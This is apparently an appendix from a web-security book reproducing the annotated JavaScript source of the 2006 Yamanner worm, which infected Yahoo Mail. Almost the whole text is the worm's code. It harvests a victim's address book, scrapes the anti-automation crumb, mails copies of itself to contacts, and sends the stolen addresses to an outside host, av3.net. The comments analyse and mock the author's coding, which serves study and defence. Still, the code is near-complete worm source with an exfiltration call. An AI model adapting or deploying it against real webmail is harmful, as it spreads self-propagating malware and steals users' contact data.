B. Source Code for Yamanner Worm
The following is the annotated source code for the Yamanner worm, which infected Yahoo’s web mail portal in June 2006.
Code View:
Scroll
/
Show All
/**
* Sends the stolen email addresses to the worm author
*/
function alertContents() {
//ensure the XMLHttpRequest has completed
if (http_request.readyState == 4) {
window.navigate('http://www.av3.net/?ShowFolder&rb=Sent&
reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&
view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&
YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&
box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&
order=down&sort=date&pos=0&view=a&head=f&box=Inbox&
BCCList=' + IDList)
}
}
/**
* Extracts the "crumb" from the response. This is a random hash
* to prevent automated sending of mail
*/
function ExtractStr(HtmlContent) {
//interesting that he used unicode escape strings because he
//couldn't use "Samy defined a variable to represent "
StartString = 'name=\u0022.crumb\u0022 value=\u0022';
EndString = '\u0022';
i = 0;
//This is bad coding. This could have been done with a RegEx
StartIndex = HtmlContent.indexOf(StartString, 0);
EndIndex = HtmlContent.indexOf(EndString, StartIndex +
StartString.length );
CutLen = EndIndex - StartIndex - StartString.length;
crumb = HtmlContent.substr(StartIndex + StartString.length ,
CutLen );
return crumb;
}
/**
* Callback function which composes the email to spread the worm
to other people in the addressbook.
*/
function Getcrumb() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
HtmlContent = http_request.responseText;
CRumb = ExtractStr(HtmlContent);
MyBody = 'this is test';
MySubj = 'New Graphic Site';
Url = 'http://us.' + Server +
'.mail.yahoo.com/ym/Compose';
var ComposeAction = compose.action;
MidIndex = ComposeAction.indexOf('&Mid=' ,0);
incIndex = ComposeAction.indexOf('&inc' ,0);
CutLen = incIndex - MidIndex - 5;
var MyMid = ComposeAction.substr(MidIndex + 5, CutLen);
QIndex = ComposeAction.indexOf('?box=' ,0);
AIndex = ComposeAction.indexOf('&Mid' ,0);
CutLen = AIndex - QIndex - 5;
var BoxName = ComposeAction.substr(QIndex + 5,
CutLen);
Param = 'SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&
PhotoMailUser=&PhotoToolInstall=&
OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&
PhotoMailInstallOrigin=&.crumb=RUMBVAL&
Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&
FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&
FwdInline=&OriginalFrom=FROMEMAIL&
OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&
AttData=&UplData=&OldAttData=&OldUplData=&FName=&
ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&
PhotoMailWith=&BrowseState=&PhotoIcon=&
ToolbarState=&VirusReport=&Attachments=&
Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&
BGFS=&BGSolid=&BGCustom=&
PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A+forwarded+
message+attached.&PhotoFrame=&
PhotoPrintAtHomeLink=&PhotoSlideShowLink=&
PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&
PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&
PhotoFlags=&start=compose&bmdomain=&showcc=&
showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&
AC_BccList=&sendtop=Send&
savedrafttop=Save+as+a+Draft&canceltop=Cancel&
FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&
Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A+
forwarded+message+attached.&Format=html&
sendbottom=Send&savedraftbottom=Save+as+a+Draft&
cancelbottom=Cancel&cancelbottom=Cancel';
Param = Param.replace('BOXNAME', BoxName);
Param = Param.replace('RUMBVAL', CRumb);
//IDList contains the victim's address book,
//collected from a previous step
Param = Param.replace('BCCLIST', IDList);
Param = Param.replace('TOEMAIL', Email);
Param = Param.replace('FROMEMAIL', 'av3yahoo.com');
Param = Param.replace('EMAILBODY', MyBody);
Param = Param.replace('PlainMESSAGE', '');
//JavaScript's replace() function only replaces
//the first instance of a string, so the author
//had to call the function multiple times
//Again, a RegEx could have been used instead
Param = Param.replace('EMAILSUBJ', MySubj);
Param = Param.replace('EMAILSUBJ', MySubj);
Param = Param.replace('EMAILSUBJ', MySubj);
Param = Param.replace('EMAILMID', MyMid);
Param = Param.replace('EMAILMID', MyMid);
makeRequest(Url , alertContents, 'POST', Param);
}
}
}
/**
* This function extracts out all the email addresses from a
* victims address book and stores them in the variable IDList
*
* This function also tells us that the worm author was not
* a sophisticated programmer. This entire function could be
* replaced with a rather simple RegEx.
*/
function GetIDs(HtmlContent) {
IDList = '';
StartString = ' <td>';
EndString = '</td>';
i = 0;
StartIndex = HtmlContent.indexOf(StartString, 0);
while(StartIndex >= 0) {
EndIndex = HtmlContent.indexOf(EndString, StartIndex);
CutLen = EndIndex - StartIndex - StartString.length;
YahooID = HtmlContent.substr(StartIndex +
StartString.length, CutLen);
//if the email address if for yahoo.com or
//yahoogroups.com
if( YahooID.indexOf('yahoo.com', 0) > 0 ||
YahooID.indexOf('yahoogroups.com', 0) > 0 )
IDList = IDList + ',' + YahooID;
StartString = '</tr>';
StartIndex = HtmlContent.indexOf(StartString,
StartIndex + 20);
StartString = ' <td>';
StartIndex = HtmlContent.indexOf(StartString,
StartIndex + 20);
i++;
}
if(IDList.substr(0,1) == ',')
IDList = IDList.substr(1, IDList.length);
if(IDList.indexOf(',', 0)>0 ) {
IDListArray = IDList.split(',');
Email = IDListArray[0];
IDList = IDList.replace(Email + ',', '');
}
//This code removes the email address of the victim who is
//currently being exploited from the list. This way the worm
//will not send a copy of itself to the same user it is
//exploiting. Not to sound like a broken record, but a
//RegEx would be much more efficient here
CurEmail = spamform.NE.value;
IDList = IDList.replace(CurEmail + ',', '');
IDList = IDList.replace(',' + CurEmail, '');
IDList = IDList.replace(CurEmail, '');
UserEmail = showLetter.FromAddress.value;
IDList = IDList.replace(',' + UserEmail, '');
IDList = IDList.replace(UserEmail + ',', '');
IDList = IDList.replace(UserEmail, '');
return IDList;
}
/**
* This function extracts the addressbook and starts composing an
* email message to spread the worm
*/
function ListContacts() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
HtmlContent = http_request.responseText;
IDList = GetIDs(HtmlContent);
makeRequest('http://us.' + Server +
'.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(),
Getcrumb, 'GET', null);
}
}
}
/**
* Reusable function to construct and send Ajax requests
*/
function makeRequest(url, Func, Method, Param) {
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
} else if (window.ActiveXObject) {
http_request = new ActiveXObject('Microsoft.XMLHTTP');
}
http_request.onreadystatechange = Func;
http_request.open(Method, url, true);
if( Method == 'GET')
http_request.send(null);
else
http_request.send(Param);
}
var http_request = false;
var Email = '';
var IDList = '';
var CRumb = '';
//notice the typo! This webpage does not open!
window.open('http://www,lastdata.com');
/*
Yahoo uses a CDN to load balance access to the mail portal.
This code figures out the domain name of the server the browser
Is currently using so it can construct an XHR to the appropriate
web server
This is unnecessary code. The attacker should have sent XHR
requests using relative URLs
*/
ServerUrl = url0;
USIndex = ServerUrl.indexOf('us.' ,0);
MailIndex = ServerUrl.indexOf('.mail' ,0);
CutLen = MailIndex - USIndex - 3;
var Server = ServerUrl.substr(USIndex + 3, CutLen);
//Starts everything going by fetching the victim's address book
makeRequest('http://us.' + Server +
'.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&
continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&
pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&
numadr=100&continuebottom=Continue&cancelbott
om=Cancel&rnd=' + Math.random(), ListContacts, 'GET', null)
BY:MUNDO HACKER